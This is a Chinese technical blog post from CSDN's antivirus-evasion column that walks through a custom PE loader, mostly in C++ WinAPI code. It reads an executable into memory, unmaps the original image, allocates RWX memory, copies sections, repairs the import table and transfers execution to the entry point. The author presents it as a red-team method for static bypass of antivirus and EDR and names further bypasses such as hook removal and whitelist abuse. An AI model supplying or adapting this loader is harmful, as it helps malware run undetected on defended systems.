PE_Loade技术解析

最新推荐文章于 2024-05-24 09:45:17 发布
最新推荐文章于 2024-05-24 09:45:17 发布
阅读量525 收藏 11
点赞数 9
分类专栏: 二进制 免杀 文章标签: 驱动开发 安全 web安全 系统安全 安全架构
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_18811919/article/details/135291556
版权

文章目录

0x0 Pe_Loade
Pe_Loader后面简称为Loader,实际上就是自己实现pe装载器的功能的技术,
该技术具有极强的免杀效果,原理为读取硬盘文件到内存卸载自内存中文件
重定位模块地址将内存文件复制到新堆修复IAT转交控制权到堆OEP,本篇文
章聚焦于代码实现阅读下列代码需要具备C++ WINAPI开发经验以及逆向经验。
0x1 Loader技术点
1.将文件读取到内存
2.读取在内存中文件的NT映像头
3.读取文件内存重定位地址中映像基址
4.使用NtUnmapViewOfSection卸载自内存中内存文件重定位模块
5.开辟具有RXW权限的堆
6.复制内存中PE头+ 节表目录到新堆
7.将节内容对齐后复制点到新堆
8.修复IAT
9.读取原程序OEP
10.将程序控制权转交给RXW堆中的OEP入口点
技术剖析-1 文件读取内存
使用CreateFile直接读取硬盘文件到内存。

	BYTE* FileBuff(char* file_path_name) {

        HANDLE handleFile=CreateFileA(file_path_name, GENERIC_READ,NULL,NULL,4,NULL,NULL);

        PLARGE_INTEGER large = (PLARGE_INTEGER)malloc(sizeof(LARGE_INTEGER));

        BOOL SizeStatus=GetFileSizeEx(handleFile, large);

        if (!SizeStatus) {

               cout << "Error:File Size" << endl;

               return 0x0;

        }

        BYTE* Buffer = (BYTE *)malloc(large->QuadPart);

        BOOL ReadFileStatus=ReadFile(handleFile, Buffer, large->QuadPart,NULL,NULL);

        if (!ReadFileStatus) {

               cout << "Error File Read" << endl;

               return 0x0;

        }

        return Buffer;

}
技术剖析-2 读取NT映像头
先使用IMAGE_DOS_HEADER 结构读取内存中的DOS头判断小端标识的MZ是否读取到DOS头,
通过DOS头中的e_magic偏移到NT映像头返回NT头。

BYTE* GetNtHdrs(BYTE* file_buffer) {

        if (file_buffer == NULL)return 0x0;

        IMAGE_DOS_HEADER* dos_headr = (IMAGE_DOS_HEADER*)(file_buffer);

        if (dos_headr->e_magic != 0x5A4D)return 0x0;

        LONG pe_offset = dos_headr->e_lfanew;//nt_header

        IMAGE_NT_HEADERS32* nt_header = (IMAGE_NT_HEADERS32*)((BYTE*)dos_headr + 
pe_offset);

        if (nt_header->Signature != IMAGE_NT_SIGNATURE) return NULL;

        return (BYTE *)nt_header;

}


        IMAGE_NT_HEADERS* nt_header=(IMAGE_NT_HEADERS*)GetNtHdrs(Buffer);//NT映像头
技术剖析-3 读取映像基址
偏移读取数据目录表IMAGE_DIRECTORY_ENTRY_BASERELOC并读取映像基址

BYTE* GetDataDirectory(BYTE* buffer) {

        IMAGE_NT_HEADERS* nt = (IMAGE_NT_HEADERS*)buffer;

        IMAGE_DATA_DIRECTORY* director = 
(IMAGE_DATA_DIRECTORY*)(&nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC]);

        if (director->VirtualAddress == NULL)return 0x0;

        return (BYTE *)director;

}


IMAGE_DATA_DIRECTORY *director= (IMAGE_DATA_DIRECTORY*)GetDataDirectory((BYTE 
*)nt_header);//基址重定位地址

        LPVOID baseImage=(LPVOID)nt_header->OptionalHeader.ImageBase;//内存映像基址
技术剖析-4 NtUnmapViewOfSection卸载模块
HMODULE dll = LoadLibraryA("ntdll.dll");

        //卸载占用内存

        ((int(WINAPI*)(HANDLE, PVOID))GetProcAddress(dll, 
"NtUnmapViewOfSection"))((HANDLE)-1, (LPVOID)nt_header->OptionalHeader.ImageBase);
技术剖析-5 开辟具有RXW权限的堆
开辟具有RXW权限的堆,堆的大小为内存文件中SizeOfImage表述的内存映射大小。

BYTE* Runmemory_ImageBase = (BYTE 
*)VirtualAlloc(baseImage,nt_header->OptionalHeader.SizeOfImage, MEM_COMMIT | MEM_RESERVE, 
PAGE_EXECUTE_READWRITE);
技术剖析-6 复制内存中PE头+ 节表目录到新堆
复制头部+节表到新堆,头部和节表总大小为可选映像头中的SizeOfHeaders
memcpy(Runmemory_ImageBase, Buffer, nt_header->OptionalHeader.SizeOfHeaders);//内存复制头+节表
技术剖析-7 将节内容对齐后复制点到新堆
节表数量位于文件头中的NumberOfSection中,将就文件堆复制到新堆中长度为SizeOfRawData内存映射后大小。

IMAGE_SECTION_HEADER* section_header = (IMAGE_SECTION_HEADER*)(size_t(nt_header) + 
sizeof(IMAGE_NT_HEADERS));

        for (int i = 0; i < nt_header->FileHeader.NumberOfSections;i++) {

               /*

                       Sections节中VirtualAddress是节在内存中偏移=ImageBase+VirtualAddress

                       PointerToRawData是节在文件中的偏移

                       SizeOfRawData是节在文件中对齐后的检测

               */

               memcpy(Runmemory_ImageBase+section_header[i].VirtualAddress,Buffer+section_header[i].PointerToRawData,section_header[i].SizeOfRawData);

        }
技术剖析-8 修复IAT
首先从RXW堆中读取NT映像头,从NT映像头中偏移读取数据目录的IMAGE_DIRECTORY_ENTRY_IMPORT导入表,导入表为IMAGE_IMPORT_DESCRTIPTOR结构,其中使用到的关键偏移有NAME:DLL名称、OriginalFirstThunk INT导入名称表的IMAGE_THUNK_DATA和FirstThunk指向IAT的导入地址表,其中INT不可修改 IAT可由自装载器填充GetProcAddress找到的函数地址,INT有两种表现形式第一种表现形式指向IMAGE_IMPORT_BY_NAME结构可以使用函数名来填充IAT第二种表现形式为MSB最高位为1说明使用序号装载IAT也同样可以使用GetProcAddress来装载序号找到函数地址并填充,INT与IAT是对应关系INT可能表现的形式不同可能为模式一或模式二这样需要编写两种方式来填充IAT,简单方式就是使用宏IMAGE_ORDINAL_FLAG32或IMAGE_ORDINAL_FLAG64来判断MSB是否为1使用序号方式否则就是函数名方式。

BOOL IatLoader(BYTE* memory_file) {

        cout << "PE Loader IAT Run Repair" << endl;

        /*

               在IMAGE_IMPORT_DECSRIPTOR结构中 使用的关键内容

               NAME 指向使用的DLL

               OriginalFirstThunk 指向INT 不可修改有两种表现形式如果MSB最高位为1说明使用序号加载如果MSB最高位为0则指向IMPORT_BY_NAME结构用函数名加载

               FirstThunk 指向IAT 可修改一般有PE装载器写入函数在内存中的地址,用于填充函数地址

        */

        IMAGE_NT_HEADERS* nt = (IMAGE_NT_HEADERS*)GetNtHdrs(memory_file);

        IMAGE_DATA_DIRECTORY* 
import_director=(IMAGE_DATA_DIRECTORY*)(&nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT]);

        if (import_director == NULL)return false;

        /*

        IMAGE_DATA_DIRECTORY 结构 VirtualAddress内存地址 Size数量

        */

        size_t maxSize = import_director->Size;

        size_t impAddr = import_director->VirtualAddress;

        IMAGE_IMPORT_DESCRIPTOR* import_descriptor = NULL;

        unsigned int parsedSize = 0;

        for (; parsedSize < maxSize; parsedSize+=sizeof(IMAGE_IMPORT_DESCRIPTOR)) {

               //指向每个IMAGE_IMPORT_DESCRIPTOR=内存RVA基址+VirtualAddress+偏移量

               import_descriptor = (IMAGE_IMPORT_DESCRIPTOR*)(impAddr + parsedSize + 
(ULONG_PTR)memory_file);

               //DLL Name=RVA基址+

               char* lib_name = (char *)(memory_file + import_descriptor->Name);

               if (*lib_name=='M'&& *(lib_name + 1)=='Z') {

                       break;

               }

               printf("    [+] Import DLL: %s\n", lib_name);

               /*

               FirstThunk:包含指向输入表(IAT)的RVA,IAT是一个IMAGE_THUNK_DATA结构的数组

               */

               size_t call_via_IAT=import_descriptor->FirstThunk;

               /*

               OriginalFirstThunk包含指向输入名称表INT的RVA,INT是一个IMAGE_THUNK_DATA结构数组,数组中每个IMAGE_THUNK_DATA

               结构都指向IMAGE_IMPORT_BY_NAME结构,数组以一个内容为0的IMAGE_THUNK_DATA结构结束。

               */

               size_t thunk_addr_INT = import_descriptor->OriginalFirstThunk;

               if (thunk_addr_INT == NULL)thunk_addr_INT = import_descriptor->FirstThunk;

               size_t offsetField = 0;

               size_t offsetThunk = 0;

               while (true)

               {

                       IMAGE_THUNK_DATA* fieldThunk = (IMAGE_THUNK_DATA*)(memory_file + 
offsetField + call_via_IAT);

                       IMAGE_THUNK_DATA* orginThunk = 
(IMAGE_THUNK_DATA*)(memory_file+offsetThunk+thunk_addr_INT);

                       /*

                       * 序号装载

                              某些情况一些函数由序号引出,只能用他们的位置调用他们,此时IMAGE_THUNK_DATA的值低位字指示函数序数

                              最高有效位(MSB)设为1可以使用IMAGE_ORDINAL_FLAG32来测试DWORD值得MSB、和IAMGE_ORDINAL_FLAG64

                       */

                       if (orginThunk->u1.Ordinal & IMAGE_ORDINAL_FLAG32 || 
orginThunk->u1.Ordinal & IMAGE_ORDINAL_FLAG64) // check if using ordinal (both x86 && x64)

                       {

                              size_t addr = (size_t)GetProcAddress(LoadLibraryA(lib_name), 
(char*)(orginThunk->u1.Ordinal & 0xFFFF));

                              printf("        API Serial %x Serial Memory %x\n", 
orginThunk->u1.Ordinal, addr);

                              fieldThunk->u1.Function = addr;

                       }

                       if (fieldThunk->u1.Function == NULL) {

                              break;

                       }

                       //使用函数名称修复IAT

                       if (fieldThunk->u1.Function == orginThunk->u1.Function) {

                              PIMAGE_IMPORT_BY_NAME by_name = 
(PIMAGE_IMPORT_BY_NAME)(memory_file+ fieldThunk->u1.AddressOfData);//转到BY_NAME结构

                              char* name = by_name->Name;

                              size_t nameAddress = 
(size_t)GetProcAddress(LoadLibraryA(lib_name), name);

                              cout << "function name:" << name << "----Address:" <<hex<< 
nameAddress << endl;



                              fieldThunk->u1.Function = nameAddress;



                       }

                       offsetField += sizeof(IMAGE_THUNK_DATA);

                       offsetThunk += sizeof(IMAGE_THUNK_DATA);

               }

        }

        cout << "PE Loader IAT Run Repair Succeed " << endl;

        return 0;

}

技术剖析-9 读取原程序OEP
RXW文件堆中的OEP程序入口位于可选映像头中的AddressOfEntryPoint偏移中。

size_t retAddr = 
(size_t)(Runmemory_ImageBase)+nt_header->OptionalHeader.AddressOfEntryPoint;

技术剖析-10 控制权转交给RXW堆中OEP地址

((void(*)())retAddr)();
总结
PeLoader技术是模拟Windows EXE装载过程,主要用于红蓝对抗对EDR查杀的规避能够
具有很强静态免杀效果,随着对抗的升级PeLoader在遇到有着较强内存查杀的EDR时候,
往往显得力不从心,可以使用其他技术进行对抗比如模块.text reload卸载R3 HOOK,白
+黑进行白名单绕过等等,红蓝对抗是永无止境的没有攻不破的系统只有不努力的黑客。
虚构之人
关注
  • 9
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
PE loader (x86)
zylg
11-20 1047
#include <iostream> #include "PeLoader32.h" #include <fstream> using namespace std; string readFile(const string & _file_name) { fstream f(_file_name.data(), ios::in|ios::binary); f.seekg(0, ios::end); size_t len = f.tellg(); f.seekg(
php_swoole_loader_php73_nzts_x64
09-26
标题“php_swoole_loader_php73_nzts_x64”... ... ...“nzts”代表“Non-ZTS”,即非线程安全(Non-Zend Thread Safety)。...64位系统能够处理更大的内存地址空间,允许应用程序使用超过4GB的内存,并且通常在性能上有优势。...
PELoaderLib
01-15
PELoaderLib, 顾名思义, PE文件加载器,允许您从缓冲区中加载EXE、DLL等PE文件.
推荐文章:SimplePELoader——轻量级PE加载器
最新发布
gitblog_00017的博客
05-24 299
推荐文章:SimplePELoader——轻量级PE加载器 项目地址:https://gitcode.com/nettitude/SimplePELoader 1、项目介绍 在软件开发和逆向工程领域,有时我们需要在不依赖操作系统API的情况下动态地加载DLL文件。这就是SimplePELoader大显身手的地方。这是一个微型的PE(Portable Executable)加载器,其设计目标是无需使...
PE Loader
pyq881120的专栏
07-17 1397
/* *LocalFile是对读文件操作的一个简单封装 */ //LocalFile.h #pragma once class CLocalFile { public: CLocalFile(const char * name); ~CLocalFile(void);
.exp文件_有趣的命令行系列——利用PEloader加载exp从而绕过杀毒软件
weixin_39952074的博客
11-27 393
黑客工具是渗透手在日常工作中必备的,很多黑客工具其实并不是木马或病毒,但是也被杀毒软件查杀,所以让自己手头的黑客工具躲过杀软也是渗透手的必要技能。Poweshell有一个peloader脚本,地址在https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-ReflectivePEInjection...
仿照windows的loader实现的pe-loader
maplele
02-09 4954
    本人接触pe文件格式不久,参考网上的一些资料写了一个pe loader,主要是通过把需要加载的文件的所所有section加载到相应的RVA上,然后进行重定位处理、导入表和导出表处理、资源段处理。由于本loader.exe会被加载到0x0f400000处,因此可以把0x400000给被加载的文件预留了,这样可以避免重定位所带来的性能损耗。导入表的处理主要是通过调用GetProcAddress
Swoole Loader 扩展包(Linux和Windows)
12-30
PHP 用的swoole loader扩展文件,Linux版的包含5.6/7.0/7.1/7.2,Windows 64的包含5.6/7.0/7.1,Windows的只支持ApacheIIS
PHP Swoole Loader扩展 Swoole扩展 Swoole Swoole Loade
08-01
2. **内存管理**:通过内存池技术,Swoole Loader扩展能更有效地管理和复用内存,避免频繁的内存分配和释放带来的性能损失。 3. **协程支持**:Swoole Loader扩展为PHP提供了原生的协程支持,使得开发者可以在PHP中...
全面解析Java类加载器
01-20
深入理解和探究Java类加载机制—-  1.java.lang.ClassLoader类介绍  java.lang.ClassLoader类的基本职责是根据一个指定的类的名称,找到或者生成其对应的字节代码,然后...  引导类加载器(bootstrap class loade
peloader:PE二进制加载器示例代码,摘自efitools
05-16
我确认可以通过使用自己的PE加载器来绕过SecureBoot模式下的BS-> LoadImage()限制,并且已在efitools上实现( ) 。 这是无需使用BS-> LoadImage()即可加载和执行二进制文件的示例代码。
windows下的pe loader源代码
02-09
参考网上的一些资料写了一个pe loader,主要是通过把需要加载的文件的所所有section加载到相应的RVA上,然后进行重定位处理、导入表和导出表处理、资源段处理。
汇编PeLoader_模块+例程
01-04
易语言:汇编PeLoader_模块+例程 内存加载DLL的实现
loadpe最新版豪华版中文
07-11
loadpe最新版豪华版中文2014.7.11无毒的
Android-Universal-Image-Loade
05-14
**Android-Universal-Image-Loader** 是一个广泛使用的Android库,专门用于在Android应用中高效、灵活地加载、缓存和显示网络图像。这个库解决了Android开发者在处理网络图片时常见的问题,比如内存管理、线程控制...
Win7 内核重载 1 ——内核版PELoader
zfdyq
12-19 8370
重载重点,其实就是自己实现一个山寨版的Windows PELoader  ,重载其实就是将一个模块自己重新加载一份到别的内存,运行它。 所谓内核重载,则是将内核文件即:ntkrnlpa.exe 自己加载一份到内存,并运行它,这样的好处可以避免一切HOOK,如SSDT ,InLineHook 等等,原理就是HOOK继续 HOOK主原来内核,但是实际上Windows走的是我们自己的内核。
peloader.c
chao
10-15 1038
/* peloader.c - PE exe loader for pecrunch */ /* Copyright 1999 Sir Dystic of the Cult of the Dead Cow */ /* sd@cultdeadcow.com http://www.cultdeadcow.com/~sd */ #include #include "lzh.h" vo
swoole_loade7.2 下载
05-31
你可以通过以下步骤下载并安装 Swoole 扩展: 1. 访问 Swoole 的官方网站 https://www.swoole.com/,进入下载页面。 2. 在下载页面中选择对应的版本,选择 e7.2 版本,点击下载按钮即可下载对应版本的扩展文件。 3. 将下载的文件解压到任意目录下。 4. 进入解压后的目录,执行命令 phpize。 5. 执行 ./configure 命令生成 Makefile 文件。 6. 执行 make 命令进行编译。 7. 执行 make install 命令进行安装。 注意:在执行上述步骤前,确保已经安装了 PHP 环境,并且已经安装了 PHP 的开发工具包。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

虚构之人

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值